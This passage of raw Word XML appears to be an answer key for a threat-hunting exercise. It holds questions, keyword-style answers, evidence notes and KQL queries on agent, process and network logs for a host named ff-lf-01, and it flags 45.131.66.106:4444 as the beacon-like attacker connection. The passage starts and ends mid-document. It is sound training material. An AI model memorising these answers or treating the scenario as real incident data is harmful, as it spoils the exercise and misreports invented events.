          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="504F62BE">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LLMAgentLogs_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="0AF8659A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where isnotempty(user_input)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="0BB4A8A2">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, actor, session_id, RunId, user_input</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="49C592F7">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="1035833"/>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23512" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId29"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="10358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68.00pt;height:81.56pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId29" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q2</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Was this run by a person, by a machine, or by a person who set a machine going? Cite at least two artefacts.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">human-tasked, LLMAgentLogs_CL, user_input, LLMAgentLogs_CL, TimeGenerated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Full session replay for jp-7f3c9a21, 19:20:01 through 19:37:00.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="21D4938E">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LLMAgentLogs_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="5BAA2C6F">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where session_id == "jp-7f3c9a21"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="2B1998A2">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, user_input, model_response</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="070DD3CA">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="1322164"/>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97819" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId30"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="13221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68.00pt;height:104.11pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId30" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="707"/>
        <w:pBdr/>
        <w:spacing w:after="100" w:before="240"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Section 8: Real or Noise</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q1</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Multiple python3.11 processes ran on this host. The binary name is the same for all. What other property of a process distinguishes its purpose?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">ActingProcessName, python3.11</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Full python3.11 population on ff-lf-01 is only 3 distinct events. That self-referential parent-child chain, one python3.11 spawning another with nothing else in between, does not occur anywhere else on the host.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="581F3DF6">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LinuxProcess_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="2744CB23">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where DvcHostname =~ "ff-lf-01" and TargetProcessName =~ "python3.11"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="0D76F7E4">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, TargetProcessId, ActingProcessName, ActingProcessCommandLine, TargetProcessCommandLine</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="493637D3">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="951621"/>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274582" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId31"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="9516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68.00pt;height:74.93pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId31" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q2</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ff-lf-01 reached several external addresses in the window. Which one is real, and what property tells you?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">DstPortNumber, 4444</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LinuxNetwork_CL summarized by destination. Four legitimate destinations sit on 443 or 8443 with dozens of connections each; 45.131.66.106:4444 is the only one on a non-standard port, with a low, beacon-like count.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="3725AFF4">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LinuxNetwork_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="3FA598BC">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where DvcHostname =~ "ff-lf-01"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="0BEB8506">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| summarize Count = count() by DstIpAddr, DstPortNumber</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by DstPortNumber asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="3A9E63FA">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="3286125" cy="3352800"/>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006588" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId32"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="3286125" cy="33527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258.75pt;height:264.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId32" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q3</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The benign python3.11 spawns are scattered through the working day. Compare that to the attacker's timing. What property separates them, and how long did the intrusion run?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
